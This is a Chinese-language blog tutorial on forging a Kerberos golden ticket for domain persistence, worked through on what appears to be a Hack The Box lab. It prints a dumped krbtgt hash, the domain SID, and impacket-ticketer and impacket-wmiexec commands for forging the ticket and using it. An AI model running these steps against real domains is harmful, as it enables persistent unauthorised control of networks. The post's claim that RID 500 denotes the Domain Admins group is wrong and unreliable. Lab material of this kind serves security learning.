文章总结： 这篇文章介绍了内网渗透中的黄金票据技术，详细解释了黄金票据作为伪造TGT的工作原理，提供了制作黄金票据所需的关键信息包括域名、SID、KRBTGT账户的NTLMhash和冒充用户名，并通过实际案例演示了如何使用impacket-ticketer工具制作黄金票据，以及如何利用该票据实现域内持久化访问 综合评分： 89 文章分类： 内网渗透,渗透测试,红队,漏洞分析,安全工具

内网渗透-黄金票据制作

JZHOUCDC

攻防之路JZhoucdc

2025年8月6日 11:14 四川

当我们拿下域，得到krbtgt用户的NTLM哈希值，我们可以制作黄金票据。实现访问持久化。

上面是Kerberos 身份验证过程，黄金票证是伪造的TGT，也称为身份验证票证。这样我们可以绕过第一阶段和第二阶段，从第三阶段直接与密钥分发中心 (KDC) 发起通信。由于黄金票证是伪造的 TGT，会包含TGS-REQ 一起发送到域控制器，以获取服务票证TGS。

黄金票据制作要求：

• Domain Name（域名）
• SID
• KRBTGT账户的NTLM hash
• 冒充的用户名

案例：

这里我们已经通过用户的DCSync权限，导出了krbtgt用户的哈希值

krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::

Domain Name为htb.local

SID有很多方法可以查看，比如使用

whoami /user

这里为SID：S-1-5-21-3072663084-364016917-1341370565

500是RID（相对标识符），它指定在该域中的特定对象。在这个 SID 中，500 表示的是域管理员（Domain Admins）组的 SID。

冒充的用户名可以随意

impacket-ticketer -dc-ip 10.10.10.161 -nthash 819af826bb148e603acb0f33d17632f8 -domain-sid S-1-5-21-3072663084-364016917-1341370565 -domain htb.local jzhoucdc

为了利用票据需要设置 KRB5CCNAME 环境变量

export KRB5CCNAME=./jzhoucdc.ccache

通过klist可以看见票据

传递票据利用

impacket-wmiexec DC01 -k